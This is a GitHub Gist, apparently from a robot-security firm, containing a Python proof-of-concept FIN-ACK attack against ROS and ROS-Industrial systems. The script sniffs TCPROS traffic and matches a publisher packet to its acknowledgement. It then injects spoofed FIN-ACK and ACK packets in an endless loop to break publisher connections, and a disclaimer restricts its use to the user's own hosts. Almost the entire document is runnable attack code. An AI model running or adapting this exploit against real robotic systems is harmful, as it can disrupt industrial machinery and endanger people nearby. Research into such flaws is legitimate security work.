Created
September 6, 2020 09:48
-
-
Save vmayoral/829e84a245de214c01cbb5e74d29d15e to your computer and use it in GitHub Desktop.
FIN-ACK attack proof-of-concept for disrupting ROS and ROS-Industrial setups.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
FIN-ACK attack for ROS | |
DISCLAIMER: Use against your own hosts only! By no means Alias Robotics | |
or the authors of this exploit encourage or promote the unauthorized tampering | |
with running robotic systems. This can cause serious human harm and material | |
damages. | |
""" | |
from scapy.all import * | |
from robosploit.modules.generic.robotics.all import * | |
from robosploit.core.exploit import * | |
from robosploit.core.http.http_client import HTTPClient | |
from scapy.layers.inet import TCP | |
from scapy.layers.l2 import Ether | |
import sys | |
# bind layers so that packages are recognized as TCPROS | |
bind_layers(TCP, TCPROS) | |
def tcpros_fin_ack(): | |
""" | |
crafting a FIN ACK interrupting publisher communications | |
""" | |
flag_valid = True | |
targetp = None | |
targetp_ack = None | |
# fetch 10 tcp packages | |
while flag_valid: | |
packages = sniff(iface="eth0", filter="tcp", count=4) | |
if len(packages[TCPROSBody]) < 1: | |
continue | |
else: | |
# find first TCPROSBody and pick a target | |
targetp = packages[TCPROSBody][-1] # pick latest instance | |
index = packages.index(packages[TCPROSBody][-1]) | |
for i in range(index + 1, len(packages)): | |
targetp_ack = packages[i] | |
# check if the ack matches appropriately | |
if targetp[IP].src == targetp_ack[IP].dst and \ | |
targetp[IP].dst == targetp_ack[IP].src and \ | |
targetp[TCP].sport == targetp_ack[TCP].dport and \ | |
targetp[TCP].dport == targetp_ack[TCP].sport and \ | |
targetp[TCP].ack == targetp_ack[TCP].seq: | |
flag_valid = False | |
break | |
if not flag_valid and targetp_ack and targetp: | |
# Option 2 | |
p_attack =IP(src=targetp[IP].src, dst=targetp[IP].dst,id=targetp[IP].id + 1,ttl=99)\ | |
/TCP(sport=targetp[TCP].sport,dport=targetp[TCP].dport,flags="FA", seq=targetp_ack[TCP].ack, | |
ack=targetp_ack[TCP].seq) | |
ans = sr1(p_attack, retry=0, timeout=1) | |
if ans and len(ans) > 0 and ans[TCP].flags == "FA": | |
p_ack =IP(src=targetp[IP].src, dst=targetp[IP].dst,id=targetp[IP].id + 1,ttl=99)\ | |
/TCP(sport=targetp[TCP].sport,dport=targetp[TCP].dport,flags="A", seq=ans[TCP].ack, | |
ack=ans[TCP].seq + 1) | |
send(p_ack) | |
while True: | |
tcpros_fin_ack() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment